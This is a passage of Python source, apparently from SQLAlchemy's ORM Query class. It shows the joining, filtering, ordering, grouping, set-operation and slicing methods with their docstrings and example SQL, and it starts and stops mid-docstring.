filter_by(name = 'some name', id = 5)
The keyword expressions are extracted from the primary
entity of the query, or the last entity that was the
target of a call to :meth:`.Query.join`.
.. seealso::
:meth:`.Query.filter` - filter on SQL expressions.
"""
clauses = [_entity_descriptor(self._joinpoint_zero(), key) == value
for key, value in kwargs.items()]
return self.filter(sql.and_(*clauses))
@_generative(_no_statement_condition, _no_limit_offset)
def order_by(self, *criterion):
"""apply one or more ORDER BY criterion to the query and return
the newly resulting ``Query``
All existing ORDER BY settings can be suppressed by
passing ``None`` - this will suppress any ORDER BY configured
on mappers as well.
Alternatively, passing False will reset ORDER BY and additionally
re-allow default mapper.order_by to take place. Note mapper.order_by
is deprecated.
"""
if len(criterion) == 1:
if criterion[0] is False:
if '_order_by' in self.__dict__:
self._order_by = False
return
if criterion[0] is None:
self._order_by = None
return
criterion = self._adapt_col_list(criterion)
if self._order_by is False or self._order_by is None:
self._order_by = criterion
else:
self._order_by = self._order_by + criterion
@_generative(_no_statement_condition, _no_limit_offset)
def group_by(self, *criterion):
"""apply one or more GROUP BY criterion to the query and return
the newly resulting :class:`.Query`
All existing GROUP BY settings can be suppressed by
passing ``None`` - this will suppress any GROUP BY configured
on mappers as well.
.. versionadded:: 1.1 GROUP BY can be cancelled by passing None,
in the same way as ORDER BY.
"""
if len(criterion) == 1:
if criterion[0] is None:
self._group_by = False
return
criterion = list(chain(*[_orm_columns(c) for c in criterion]))
criterion = self._adapt_col_list(criterion)
if self._group_by is False:
self._group_by = criterion
else:
self._group_by = self._group_by + criterion
@_generative(_no_statement_condition, _no_limit_offset)
def having(self, criterion):
r"""apply a HAVING criterion to the query and return the
newly resulting :class:`.Query`.
:meth:`~.Query.having` is used in conjunction with
:meth:`~.Query.group_by`.
HAVING criterion makes it possible to use filters on aggregate
functions like COUNT, SUM, AVG, MAX, and MIN, eg.::
q = session.query(User.id).\
join(User.addresses).\
group_by(User.id).\
having(func.count(Address.id) > 2)
"""
criterion = expression._expression_literal_as_text(criterion)
if criterion is not None and \
not isinstance(criterion, sql.ClauseElement):
raise sa_exc.ArgumentError(
"having() argument must be of type "
"sqlalchemy.sql.ClauseElement or string")
criterion = self._adapt_clause(criterion, True, True)
if self._having is not None:
self._having = self._having & criterion
else:
self._having = criterion
def _set_op(self, expr_fn, *q):
return self._from_selectable(
expr_fn(*([self] + list(q)))
)._set_enable_single_crit(False)
def union(self, *q):
"""Produce a UNION of this Query against one or more queries.
e.g.::
q1 = sess.query(SomeClass).filter(SomeClass.foo=='bar')
q2 = sess.query(SomeClass).filter(SomeClass.bar=='foo')
q3 = q1.union(q2)
The method accepts multiple Query objects so as to control
the level of nesting. A series of ``union()`` calls such as::
x.union(y).union(z).all()
will nest on each ``union()``, and produces::
SELECT * FROM (SELECT * FROM (SELECT * FROM X UNION
SELECT * FROM y) UNION SELECT * FROM Z)
Whereas::
x.union(y, z).all()
produces::
SELECT * FROM (SELECT * FROM X UNION SELECT * FROM y UNION
SELECT * FROM Z)
Note that many database backends do not allow ORDER BY to
be rendered on a query called within UNION, EXCEPT, etc.
To disable all ORDER BY clauses including those configured
on mappers, issue ``query.order_by(None)`` - the resulting
:class:`.Query` object will not render ORDER BY within
its SELECT statement.
"""
return self._set_op(expression.union, *q)
def union_all(self, *q):
"""Produce a UNION ALL of this Query against one or more queries.
Works the same way as :meth:`~sqlalchemy.orm.query.Query.union`. See
that method for usage examples.
"""
return self._set_op(expression.union_all, *q)
def intersect(self, *q):
"""Produce an INTERSECT of this Query against one or more queries.
Works the same way as :meth:`~sqlalchemy.orm.query.Query.union`. See
that method for usage examples.
"""
return self._set_op(expression.intersect, *q)
def intersect_all(self, *q):
"""Produce an INTERSECT ALL of this Query against one or more queries.
Works the same way as :meth:`~sqlalchemy.orm.query.Query.union`. See
that method for usage examples.
"""
return self._set_op(expression.intersect_all, *q)
def except_(self, *q):
"""Produce an EXCEPT of this Query against one or more queries.
Works the same way as :meth:`~sqlalchemy.orm.query.Query.union`. See
that method for usage examples.
"""
return self._set_op(expression.except_, *q)
def except_all(self, *q):
"""Produce an EXCEPT ALL of this Query against one or more queries.
Works the same way as :meth:`~sqlalchemy.orm.query.Query.union`. See
that method for usage examples.
"""
return self._set_op(expression.except_all, *q)
def join(self, *props, **kwargs):
r"""Create a SQL JOIN against this :class:`.Query` object's criterion
and apply generatively, returning the newly resulting :class:`.Query`.
**Simple Relationship Joins**
Consider a mapping between two classes ``User`` and ``Address``,
with a relationship ``User.addresses`` representing a collection
of ``Address`` objects associated with each ``User``. The most
common usage of :meth:`~.Query.join` is to create a JOIN along this
relationship, using the ``User.addresses`` attribute as an indicator
for how this should occur::
q = session.query(User).join(User.addresses)
Where above, the call to :meth:`~.Query.join` along ``User.addresses``
will result in SQL equivalent to::
SELECT user.* FROM user JOIN address ON user.id = address.user_id
In the above example we refer to ``User.addresses`` as passed to
:meth:`~.Query.join` as the *on clause*, that is, it indicates
how the "ON" portion of the JOIN should be constructed. For a
single-entity query such as the one above (i.e. we start by selecting
only from ``User`` and nothing else), the relationship can also be
specified by its string name::
q = session.query(User).join("addresses")
:meth:`~.Query.join` can also accommodate multiple
"on clause" arguments to produce a chain of joins, such as below
where a join across four related entities is constructed::
q = session.query(User).join("orders", "items", "keywords")
The above would be shorthand for three separate calls to
:meth:`~.Query.join`, each using an explicit attribute to indicate
the source entity::
q = session.query(User).\
join(User.orders).\
join(Order.items).\
join(Item.keywords)
**Joins to a Target Entity or Selectable**
A second form of :meth:`~.Query.join` allows any mapped entity
or core selectable construct as a target. In this usage,
:meth:`~.Query.join` will attempt
to create a JOIN along the natural foreign key relationship between
two entities::
q = session.query(User).join(Address)
The above calling form of :meth:`~.Query.join` will raise an error if
either there are no foreign keys between the two entities, or if
there are multiple foreign key linkages between them. In the
above calling form, :meth:`~.Query.join` is called upon to
create the "on clause" automatically for us. The target can
be any mapped entity or selectable, such as a :class:`.Table`::
q = session.query(User).join(addresses_table)
**Joins to a Target with an ON Clause**
The third calling form allows both the target entity as well
as the ON clause to be passed explicitly. Suppose for
example we wanted to join to ``Address`` twice, using
an alias the second time. We use :func:`~sqlalchemy.orm.aliased`
to create a distinct alias of ``Address``, and join
to it using the ``target, onclause`` form, so that the
alias can be specified explicitly as the target along with
the relationship to instruct how the ON clause should proceed::
a_alias = aliased(Address)
q = session.query(User).\
join(User.addresses).\
join(a_alias, User.addresses).\
filter(Address.email_address=='ed@foo.com').\
filter(a_alias.email_address=='ed@bar.com')
Where above, the generated SQL would be similar to::
SELECT user.* FROM user
JOIN address ON user.id = address.user_id
JOIN address AS address_1 ON user.id=address_1.user_id
WHERE address.email_address = :email_address_1
AND address_1.email_address = :email_address_2
The two-argument calling form of :meth:`~.Query.join`
also allows us to construct arbitrary joins with SQL-oriented
"on clause" expressions, not relying upon configured relationships
at all. Any SQL expression can be passed as the ON clause
when using the two-argument form, which should refer to the target
entity in some way as well as an applicable source entity::
q = session.query(User).join(Address, User.id==Address.user_id)
.. versionchanged:: 0.7
In SQLAlchemy 0.6 and earlier, the two argument form of
:meth:`~.Query.join` requires the usage of a tuple:
``query(User).join((Address, User.id==Address.user_id))``\ .
This calling form is accepted in 0.7 and further, though
is not necessary unless multiple join conditions are passed to
a single :meth:`~.Query.join` call, which itself is also not
generally necessary as it is now equivalent to multiple
calls (this wasn't always the case).
**Advanced Join Targeting and Adaption**
There is a lot of flexibility in what the "target" can be when using
:meth:`~.Query.join`. As noted previously, it also accepts
:class:`.Table` constructs and other selectables such as
:func:`.alias` and :func:`.select` constructs, with either the one
or two-argument forms::
addresses_q = select([Address.user_id]).\
where(Address.email_address.endswith("@bar.com")).\
alias()
q = session.query(User).\
join(addresses_q, addresses_q.c.user_id==User.id)
:meth:`~.Query.join` also features the ability to *adapt* a
:meth:`~sqlalchemy.orm.relationship` -driven ON clause to the target
selectable. Below we construct a JOIN from ``User`` to a subquery
against ``Address``, allowing the relationship denoted by
``User.addresses`` to *adapt* itself to the altered target::
address_subq = session.query(Address).\
filter(Address.email_address == 'ed@foo.com').\
subquery()
q = session.query(User).join(address_subq, User.addresses)
Producing SQL similar to::
SELECT user.* FROM user
JOIN (
SELECT address.id AS id,
address.user_id AS user_id,
address.email_address AS email_address
FROM address
WHERE address.email_address = :email_address_1
) AS anon_1 ON user.id = anon_1.user_id
The above form allows one to fall back onto an explicit ON
clause at any time::
q = session.query(User).\
join(address_subq, User.id==address_subq.c.user_id)
**Controlling what to Join From**
While :meth:`~.Query.join` exclusively deals with the "right"
side of the JOIN, we can also control the "left" side, in those
cases where it's needed, using :meth:`~.Query.select_from`.
Below we construct a query against ``Address`` but can still
make usage of ``User.addresses`` as our ON clause by instructing
the :class:`.Query` to select first from the ``User``
entity::
q = session.query(Address).select_from(User).\
join(User.addresses).\
filter(User.name == 'ed')
Which will produce SQL similar to::
SELECT address.* FROM user
JOIN address ON user.id=address.user_id
WHERE user.name = :name_1
**Constructing Aliases Anonymously**
:meth:`~.Query.join` can construct anonymous aliases
using the ``aliased=True`` flag. This feature is useful
when a query is being joined algorithmically, such as
when querying self-referentially to an arbitrary depth::
q = session.query(Node).\
join("children", "children", aliased=True)
When ``aliased=True`` is used, the actual "alias" construct
is not explicitly available. To work with it, methods such as
:meth:`.Query.filter` will adapt the incoming entity to
the last join point::
q = session.query(Node).\
join("children", "children", aliased=True).\
filter(Node.name == 'grandchild 1')
When using automatic aliasing, the ``from_joinpoint=True``
argument can allow a multi-node join to be broken into
multiple calls to :meth:`~.Query.join`, so that
each path along the way can be further filtered::
q = session.query(Node).\
join("children", aliased=True).\
filter(Node.name == 'child 1').\
join("children", aliased=True, from_joinpoint=True).\
filter(Node.name == 'grandchild 1')
The filtering aliases above can then be reset back to the
original ``Node`` entity using :meth:`~.Query.reset_joinpoint`::
q = session.query(Node).\
join("children", "children", aliased=True).\
filter(Node.name == 'grandchild 1').\
reset_joinpoint().\
filter(Node.name == 'parent 1')
For an example of ``aliased=True``, see the distribution
example :ref:`examples_xmlpersistence` which illustrates
an XPath-like query system using algorithmic joins.
:param \*props: A collection of one or more join conditions,
each consisting of a relationship-bound attribute or string
relationship name representing an "on clause", or a single
target entity, or a tuple in the form of ``(target, onclause)``.
A special two-argument calling form of the form ``target, onclause``
is also accepted.
:param aliased=False: If True, indicate that the JOIN target should be
anonymously aliased. Subsequent calls to :meth:`~.Query.filter`
and similar will adapt the incoming criterion to the target
alias, until :meth:`~.Query.reset_joinpoint` is called.
:param isouter=False: If True, the join used will be a left outer join,
just as if the :meth:`.Query.outerjoin` method were called. This
flag is here to maintain consistency with the same flag as accepted
by :meth:`.FromClause.join` and other Core constructs.
.. versionadded:: 1.0.0
:param full=False: render FULL OUTER JOIN; implies ``isouter``.
.. versionadded:: 1.1
:param from_joinpoint=False: When using ``aliased=True``, a setting
of True here will cause the join to be from the most recent
joined target, rather than starting back from the original
FROM clauses of the query.
.. seealso::
:ref:`ormtutorial_joins` in the ORM tutorial.
:ref:`inheritance_toplevel` for details on how
:meth:`~.Query.join` is used for inheritance relationships.
:func:`.orm.join` - a standalone ORM-level join function,
used internally by :meth:`.Query.join`, which in previous
SQLAlchemy versions was the primary ORM-level joining interface.
"""
aliased, from_joinpoint, isouter, full = kwargs.pop('aliased', False),\
kwargs.pop('from_joinpoint', False),\
kwargs.pop('isouter', False),\
kwargs.pop('full', False)
if kwargs:
raise TypeError("unknown arguments: %s" %
', '.join(sorted(kwargs)))
return self._join(props,
outerjoin=isouter, full=full,
create_aliases=aliased,
from_joinpoint=from_joinpoint)
def outerjoin(self, *props, **kwargs):
    """Create a LEFT OUTER JOIN against this ``Query`` object's
    criterion and apply generatively, returning the newly resulting
    ``Query``.

    Usage is the same as the ``join()`` method.

    """
    aliased = kwargs.pop('aliased', False)
    from_joinpoint = kwargs.pop('from_joinpoint', False)
    full = kwargs.pop('full', False)
    if kwargs:
        raise TypeError("unknown arguments: %s" %
                        ', '.join(sorted(kwargs)))
    return self._join(
        props,
        outerjoin=True, full=full,
        create_aliases=aliased,
        from_joinpoint=from_joinpoint)
def _update_joinpoint(self, jp):
    # Install ``jp`` as the current join point, then rebuild the spine
    # of the ``_joinpath`` tree above it.  Each ancestor dict is copied
    # before being modified, so that path dicts possibly shared with
    # other Query objects are never mutated.
    self._joinpoint = jp
    node = jp
    while 'prev' in node:
        edge, parent = node['prev']
        parent = parent.copy()
        parent[edge] = node
        node['prev'] = (edge, parent)
        node = parent
    self._joinpath = node
@_generative(_no_statement_condition, _no_limit_offset)
def _join(self, keys, outerjoin, full, create_aliases, from_joinpoint):
    """consumes arguments from join() or outerjoin(), places them into a
    consistent format with which to form the actual JOIN constructs.

    :param keys: positional arguments from join()/outerjoin(); each is a
     join target (entity/selectable), an ON clause (string relationship
     name, relationship attribute, or clause element), or a
     ``(target, onclause)`` tuple.
    :param outerjoin: if True, render LEFT OUTER JOIN.
    :param full: if True, render FULL OUTER JOIN.
    :param create_aliases: the ``aliased=True`` behavior; anonymously
     alias each join target.
    :param from_joinpoint: if True, continue from the most recent join
     target instead of resetting to the query's base FROM entities.
    """
    if not from_joinpoint:
        self._reset_joinpoint()

    if len(keys) == 2 and \
            isinstance(keys[0], (expression.FromClause,
                                 type, AliasedClass)) and \
            isinstance(keys[1], (str, expression.ClauseElement,
                                 interfaces.PropComparator)):
        # detect 2-arg form of join and
        # convert to a tuple.
        keys = (keys,)

    keylist = util.to_list(keys)
    for idx, arg1 in enumerate(keylist):
        if isinstance(arg1, tuple):
            # "tuple" form of join, multiple
            # tuples are accepted as well.  The simpler
            # "2-arg" form is preferred.  May deprecate
            # the "tuple" usage.
            arg1, arg2 = arg1
        else:
            arg2 = None

        # determine onclause/right_entity.  there
        # is a little bit of legacy behavior still at work here
        # which means they might be in either order.  may possibly
        # lock this down to (right_entity, onclause) in 0.6.
        if isinstance(
                arg1, (interfaces.PropComparator, util.string_types)):
            right_entity, onclause = arg2, arg1
        else:
            right_entity, onclause = arg1, arg2

        left_entity = prop = None

        if isinstance(onclause, interfaces.PropComparator):
            of_type = getattr(onclause, '_of_type', None)
        else:
            of_type = None

        if isinstance(onclause, util.string_types):
            # string name: resolve against the current join point
            left_entity = self._joinpoint_zero()

            descriptor = _entity_descriptor(left_entity, onclause)
            onclause = descriptor

        # check for q.join(Class.propname, from_joinpoint=True)
        # and Class is that of the current joinpoint
        elif from_joinpoint and \
                isinstance(onclause, interfaces.PropComparator):
            left_entity = onclause._parententity

            info = inspect(self._joinpoint_zero())
            left_mapper, left_selectable, left_is_aliased = \
                getattr(info, 'mapper', None), \
                info.selectable, \
                getattr(info, 'is_aliased_class', None)

            if left_mapper is left_entity:
                # re-anchor the attribute onto the joinpoint entity
                left_entity = self._joinpoint_zero()
                descriptor = _entity_descriptor(left_entity,
                                                onclause.key)
                onclause = descriptor

        if isinstance(onclause, interfaces.PropComparator):
            if right_entity is None:
                if of_type:
                    right_entity = of_type
                else:
                    right_entity = onclause.property.mapper

            left_entity = onclause._parententity

            alias = self._polymorphic_adapters.get(left_entity, None)
            # could be None or could be ColumnAdapter also
            if isinstance(alias, ORMAdapter) and \
                    alias.mapper.isa(left_entity):
                left_entity = alias.aliased_class
                onclause = getattr(left_entity, onclause.key)

            prop = onclause.property
            if not isinstance(onclause, attributes.QueryableAttribute):
                onclause = prop

            if not create_aliases:
                # check for this path already present.
                # don't render in that case.
                edge = (left_entity, right_entity, prop.key)
                if edge in self._joinpoint:
                    # The child's prev reference might be stale --
                    # it could point to a parent older than the
                    # current joinpoint.  If this is the case,
                    # then we need to update it and then fix the
                    # tree's spine with _update_joinpoint.  Copy
                    # and then mutate the child, which might be
                    # shared by a different query object.
                    jp = self._joinpoint[edge].copy()
                    jp['prev'] = (edge, self._joinpoint)
                    self._update_joinpoint(jp)

                    if idx == len(keylist) - 1:
                        util.warn(
                            "Pathed join target %s has already "
                            "been joined to; skipping" % prop)
                    continue
        elif onclause is not None and right_entity is None:
            # TODO: no coverage here
            raise NotImplementedError("query.join(a==b) not supported.")

        self._join_left_to_right(
            left_entity,
            right_entity, onclause,
            outerjoin, full, create_aliases, prop)
def _join_left_to_right(self, left, right,
                        onclause, outerjoin, full, create_aliases, prop):
    """append a JOIN to the query's from clause.

    Resolves the "left" side when not given, validates that the join is
    not degenerate (same entity / selectable on both sides), prepares
    the right side (possibly aliasing it), records the join point, and
    finally splices the JOIN into the FROM list via ``_join_to_left``.
    """

    self._polymorphic_adapters = self._polymorphic_adapters.copy()

    if left is None:
        # no explicit left side; infer it from an explicit FROM list,
        # else from the first query entity.
        if self._from_obj:
            left = self._from_obj[0]
        elif self._entities:
            left = self._entities[0].entity_zero_or_selectable

    if left is None:
        if self._entities:
            problem = "Don't know how to join from %s" % self._entities[0]
        else:
            problem = "No entities to join from"

        raise sa_exc.InvalidRequestError(
            "%s; please use "
            "select_from() to establish the left "
            "entity/selectable of this join" % problem)

    if left is right and \
            not create_aliases:
        raise sa_exc.InvalidRequestError(
            "Can't construct a join from %s to %s, they "
            "are the same entity" %
            (left, right))

    l_info = inspect(left)
    r_info = inspect(right)

    overlap = False
    if not create_aliases:
        right_mapper = getattr(r_info, "mapper", None)
        # if the target is a joined inheritance mapping,
        # be more liberal about auto-aliasing.
        if right_mapper and (
            right_mapper.with_polymorphic or
            isinstance(right_mapper.mapped_table, expression.Join)
        ):
            for from_obj in self._from_obj or [l_info.selectable]:
                if sql_util.selectables_overlap(
                        l_info.selectable, from_obj) and \
                        sql_util.selectables_overlap(
                            from_obj, r_info.selectable):
                    overlap = True
                    break

    if (overlap or not create_aliases) and \
            l_info.selectable is r_info.selectable:
        raise sa_exc.InvalidRequestError(
            "Can't join table/selectable '%s' to itself" %
            l_info.selectable)

    right, onclause = self._prepare_right_side(
        r_info, right, onclause,
        create_aliases,
        prop, overlap)

    # if joining on a MapperProperty path,
    # track the path to prevent redundant joins
    if not create_aliases and prop:
        self._update_joinpoint({
            '_joinpoint_entity': right,
            'prev': ((left, right, prop.key), self._joinpoint)
        })
    else:
        self._joinpoint = {'_joinpoint_entity': right}

    self._join_to_left(l_info, left, right, onclause, outerjoin, full)
def _prepare_right_side(self, r_info, right, onclause, create_aliases,
                        prop, overlap):
    """Resolve the right side of a JOIN into a (possibly aliased)
    target and its ON clause, installing filter/result adapters as
    needed.  Returns ``(right, onclause)``.
    """
    info = r_info

    right_mapper, right_selectable, right_is_aliased = \
        getattr(info, 'mapper', None), \
        info.selectable, \
        getattr(info, 'is_aliased_class', False)

    if right_mapper:
        self._join_entities += (info, )

    if right_mapper and prop and \
            not right_mapper.common_parent(prop.mapper):
        raise sa_exc.InvalidRequestError(
            "Join target %s does not correspond to "
            "the right side of join condition %s" % (right, onclause)
        )

    if not right_mapper and prop:
        right_mapper = prop.mapper

    need_adapter = False

    if r_info.is_clause_element and right_selectable._is_lateral:
        # orm_only is disabled to suit the case where we have to
        # adapt an explicit correlate(Entity) - the select() loses
        # the ORM-ness in this case right now, ideally it would not
        right = self._adapt_clause(right, True, False)

    if right_mapper and right is right_selectable:
        # a plain selectable was given for a mapped target; it must
        # derive from the mapped table, and is wrapped in an alias.
        if not right_selectable.is_derived_from(
                right_mapper.mapped_table):
            raise sa_exc.InvalidRequestError(
                "Selectable '%s' is not derived from '%s'" %
                (right_selectable.description,
                 right_mapper.mapped_table.description))

        if isinstance(right_selectable, expression.SelectBase):
            # TODO: this isn't even covered now!
            right_selectable = right_selectable.alias()
            need_adapter = True

        right = aliased(right_mapper, right_selectable)

    aliased_entity = right_mapper and \
        not right_is_aliased and \
        (
            right_mapper.with_polymorphic and isinstance(
                right_mapper._with_polymorphic_selectable,
                expression.Alias)
            or
            overlap  # test for overlap:
            # orm/inheritance/relationships.py
            # SelfReferentialM2MTest
        )

    if not need_adapter and (create_aliases or aliased_entity):
        right = aliased(right, flat=True)
        need_adapter = True

    # if an alias() of the right side was generated here,
    # apply an adapter to all subsequent filter() calls
    # until reset_joinpoint() is called.
    if need_adapter:
        self._filter_aliases = ORMAdapter(
            right,
            equivalents=right_mapper and
            right_mapper._equivalent_columns or {},
            chain_to=self._filter_aliases)

    # if the onclause is a ClauseElement, adapt it with any
    # adapters that are in place right now
    if isinstance(onclause, expression.ClauseElement):
        onclause = self._adapt_clause(onclause, True, True)

    # if an alias() on the right side was generated,
    # which is intended to wrap a the right side in a subquery,
    # ensure that columns retrieved from this target in the result
    # set are also adapted.
    if aliased_entity and not create_aliases:
        self._mapper_loads_polymorphically_with(
            right_mapper,
            ORMAdapter(
                right,
                equivalents=right_mapper._equivalent_columns
            )
        )

    return right, onclause
def _join_to_left(self, l_info, left, right, onclause, outerjoin, full):
    """Splice a JOIN from ``left`` to ``right`` into this query's FROM
    list, either replacing an existing FROM element in place or
    appending a new one.
    """
    info = l_info
    left_mapper = getattr(info, 'mapper', None)
    left_selectable = info.selectable

    if self._from_obj:
        # an explicit FROM list is present; find the element that the
        # left side corresponds to and replace it with the JOIN.
        replace_clause_index, clause = sql_util.find_join_source(
            self._from_obj,
            left_selectable)
        if clause is not None:
            try:
                clause = orm_join(clause,
                                  right,
                                  onclause, isouter=outerjoin, full=full)
            except sa_exc.ArgumentError as ae:
                raise sa_exc.InvalidRequestError(
                    "Could not find a FROM clause to join from. "
                    "Tried joining to %s, but got: %s" % (right, ae))

            self._from_obj = \
                self._from_obj[:replace_clause_index] + \
                (clause, ) + \
                self._from_obj[replace_clause_index + 1:]
            return

    if left_mapper:
        # prefer the selectable of a query entity that corresponds to
        # the left side; fall back to the left entity itself.
        for ent in self._entities:
            if ent.corresponds_to(left):
                clause = ent.selectable
                break
        else:
            clause = left
    else:
        clause = left_selectable

    assert clause is not None
    try:
        clause = orm_join(
            clause, right, onclause, isouter=outerjoin, full=full)
    except sa_exc.ArgumentError as ae:
        raise sa_exc.InvalidRequestError(
            "Could not find a FROM clause to join from. "
            "Tried joining to %s, but got: %s" % (right, ae))
    self._from_obj = self._from_obj + (clause,)
def _reset_joinpoint(self):
    # Rewind the join point to the root of the join path and drop any
    # filter adaptation that an aliased join had put in place.
    self._filter_aliases = None
    self._joinpoint = self._joinpath
@_generative(_no_statement_condition)
def reset_joinpoint(self):
    """Return a new :class:`.Query`, where the "join point" has been
    rewound to the base FROM entities of the query.

    This is typically used together with the ``aliased=True`` feature
    of the :meth:`~.Query.join` method; see the example in
    :meth:`~.Query.join` for how this is used.

    """
    self._reset_joinpoint()
@_generative(_no_clauseelement_condition)
def select_from(self, *from_obj):
    r"""Set the FROM clause of this :class:`.Query` explicitly.

    Often used in conjunction with :meth:`.Query.join` to control
    which entity is selected from on the "left" side of the join:
    the given entity or selectable replaces the "left edge" of
    subsequent :meth:`~.Query.join` calls when no join point is
    otherwise established (by default that is the leftmost entity
    in the :class:`~.Query` object's list of entities).

    A typical example::

        q = session.query(Address).select_from(User).\
            join(User.addresses).\
            filter(User.name == 'ed')

    which produces SQL equivalent to::

        SELECT address.* FROM user
        JOIN address ON user.id=address.user_id
        WHERE user.name = :name_1

    :param \*from_obj: collection of one or more entities to apply
     to the FROM clause.  Entities can be mapped classes,
     :class:`.AliasedClass` objects, :class:`.Mapper` objects
     as well as core :class:`.FromClause` elements like subqueries.

    .. versionchanged:: 0.9
        This method no longer applies the given FROM object
        to be the selectable from which matching entities
        select from; the :meth:`.select_entity_from` method
        now accomplishes this.

    .. seealso::

        :meth:`~.Query.join`

        :meth:`.Query.select_entity_from`

    """
    self._set_select_from(from_obj, False)
@_generative(_no_clauseelement_condition)
def select_entity_from(self, from_obj):
    r"""Set the FROM clause of this :class:`.Query` to a core
    selectable, applying it as a replacement FROM clause for
    corresponding mapped entities.

    Unlike :meth:`.Query.select_from`, which only sets the FROM
    clause, this method additionally *adapts* all other occurrences
    of the entity within the query - WHERE criteria, ORDER BY and
    so on - to the given selectable, as if an :func:`.aliased`
    construct had been applied throughout::

        select_stmt = select([User]).where(User.id == 7)

        q = session.query(User).\
            select_entity_from(select_stmt).\
            filter(User.name == 'ed')

    The generated SQL shows the ``User`` entity adapted to the
    statement, including within the WHERE clause:

    .. sourcecode:: sql

        SELECT anon_1.id AS anon_1_id, anon_1.name AS anon_1_name
        FROM (SELECT "user".id AS id, "user".name AS name
        FROM "user"
        WHERE "user".id = :id_1) AS anon_1
        WHERE anon_1.name = :name_1

    Textual SQL may be used by wrapping it with :func:`.text` and
    aligning it to the entity via :meth:`.TextClause.columns`::

        text_stmt = text("select id, name from user").columns(
            User.id, User.name)
        q = session.query(User).select_entity_from(text_stmt)

    An :func:`.aliased` object is also accepted, so that options
    such as :paramref:`.aliased.adapt_on_names` may be used within
    the scope of the adaptation, e.g. to select from a reflected
    view with matching column names::

        user_view = Table('user_view', metadata,
                          autoload_with=engine)
        user_view_alias = aliased(
            User, user_view, adapt_on_names=True)
        q = session.query(User).\
            select_entity_from(user_view_alias).\
            order_by(User.name)

    .. versionchanged:: 1.1.7 The :meth:`.Query.select_entity_from`
       method now accepts an :func:`.aliased` object as an alternative
       to a :class:`.FromClause` object.

    :param from_obj: a :class:`.FromClause` object that will replace
     the FROM clause of this :class:`.Query`.  It also may be an
     instance of :func:`.aliased`.

    .. seealso::

        :meth:`.Query.select_from`

    """
    self._set_select_from([from_obj], True)
def __getitem__(self, item):
    """Emulate list-style indexing and slicing against the query's
    results, using LIMIT/OFFSET where possible."""
    if not isinstance(item, slice):
        # single-index access: -1 means "last row", which requires
        # fetching everything; other indexes fetch a one-row slice.
        if item == -1:
            return list(self)[-1]
        return list(self[item:item + 1])[0]

    start, stop, step = util.decode_slice(item)

    if isinstance(stop, int) and \
            isinstance(start, int) and \
            stop - start <= 0:
        return []

    # perhaps we should execute a count() here so that we
    # can still use LIMIT/OFFSET ?
    elif (isinstance(start, int) and start < 0) \
            or (isinstance(stop, int) and stop < 0):
        # negative bounds require the full result to be materialized
        return list(self)[item]

    res = self.slice(start, stop)
    if step is None:
        return list(res)
    return list(res)[None:None:item.step]
@_generative(_no_statement_condition)
def slice(self, start, stop):
    """Compute the "slice" of the :class:`.Query` represented by
    the given indices and return the resulting :class:`.Query`.

    The start and stop indices behave like the argument to Python's
    built-in :func:`range` function, providing an alternative to
    ``LIMIT``/``OFFSET``.  For example, ::

        session.query(User).order_by(User.id).slice(1, 3)

    renders as

    .. sourcecode:: sql

       SELECT users.id AS users_id,
              users.name AS users_name
       FROM users ORDER BY users.id
       LIMIT ? OFFSET ?
       (2, 1)

    .. seealso::

       :meth:`.Query.limit`

       :meth:`.Query.offset`

    """
    if start is not None:
        # slicing again offsets relative to any existing OFFSET
        self._offset = (self._offset or 0) + start
        if stop is not None:
            self._limit = stop - start
    elif stop is not None:
        self._limit = stop

    # an OFFSET of zero is equivalent to no OFFSET at all
    if self._offset == 0:
        self._offset = None
@_generative(_no_statement_condition)
def limit(self, limit):
    """Apply a ``LIMIT`` clause to the query and return the newly
    resulting ``Query``.

    """
    # stored as-is; rendered at statement-compilation time
    self._limit = limit
@_generative(_no_statement_condition)
def offset(self, offset):
    """Apply an ``OFFSET`` clause to the query and return the newly
    resulting ``Query``.

    """
    # stored as-is; rendered at statement-compilation time
    self._offset = offset
@_generative(_no_statement_condition)
def distinct(self, *expr):
    r"""Apply a ``DISTINCT`` to the query and return the newly resulting
    ``Query``.

    .. note::

        The :meth:`.distinct` call includes logic that will
        automatically add columns from the query's ORDER BY to the
        columns clause of the SELECT statement, to satisfy the common
        database requirement that ORDER BY columns be part of the
        SELECT list when DISTINCT is used.  Those columns *are not*
        part of the rows actually fetched by the :class:`.Query`, so
        results are unaffected; they do appear when using the
        :attr:`.Query.statement` accessor.

    :param \*expr: optional column expressions.  When present,
     the PostgreSQL dialect will render a
     ``DISTINCT ON (<expressions>)`` construct.

    """
    if not expr:
        self._distinct = True
        return
    adapted = self._adapt_col_list(expr)
    if isinstance(self._distinct, list):
        self._distinct += adapted
    else:
        self._distinct = adapted
@_generative()
def prefix_with(self, *prefixes):
    r"""Apply the prefixes to the query and return the newly resulting
    ``Query``.

    :param \*prefixes: optional prefixes, typically strings,
     not using any commas.  In particular is useful for MySQL
     keywords, e.g.::

        query = sess.query(User.name).\
            prefix_with('HIGH_PRIORITY').\
            prefix_with('SQL_SMALL_RESULT', 'ALL')

     would render::

        SELECT HIGH_PRIORITY SQL_SMALL_RESULT ALL users.name AS users_name
        FROM users

    .. versionadded:: 0.7.7

    .. seealso::

        :meth:`.HasPrefixes.prefix_with`

    """
    existing = self._prefixes
    if existing:
        self._prefixes = existing + prefixes
    else:
        self._prefixes = prefixes
@_generative()
def suffix_with(self, *suffixes):
    r"""Apply the suffix to the query and return the newly resulting
    ``Query``.

    :param \*suffixes: optional suffixes, typically strings,
     not using any commas.

    .. versionadded:: 1.0.0

    .. seealso::

        :meth:`.Query.prefix_with`

        :meth:`.HasSuffixes.suffix_with`

    """
    existing = self._suffixes
    if existing:
        self._suffixes = existing + suffixes
    else:
        self._suffixes = suffixes
def all(self):
    """Return the results represented by this ``Query`` as a list.

    This causes the underlying query to be executed.

    """
    return list(self)
@_generative(_no_clauseelement_condition)
def from_statement(self, statement):
    """Execute the given SELECT statement and return results.

    This method bypasses all internal statement compilation; the
    statement is executed without modification.  The statement is
    typically either a :func:`~.expression.text` or
    :func:`~.expression.select` construct, and should return the set
    of columns appropriate to the entity class represented by this
    :class:`.Query`.

    .. seealso::

        :ref:`orm_tutorial_literal_sql` - usage examples in the
        ORM tutorial

    """
    stmt = expression._expression_literal_as_text(statement)
    if isinstance(stmt, (expression.TextClause,
                         expression.SelectBase)):
        self._statement = stmt
    else:
        raise sa_exc.ArgumentError(
            "from_statement accepts text(), select(), "
            "and union() objects only.")
def first(self):
    """Return the first result of this ``Query`` or
    None if the result doesn't contain any row.

    first() applies a limit of one within the generated SQL, so that
    only one primary entity row is generated on the server side
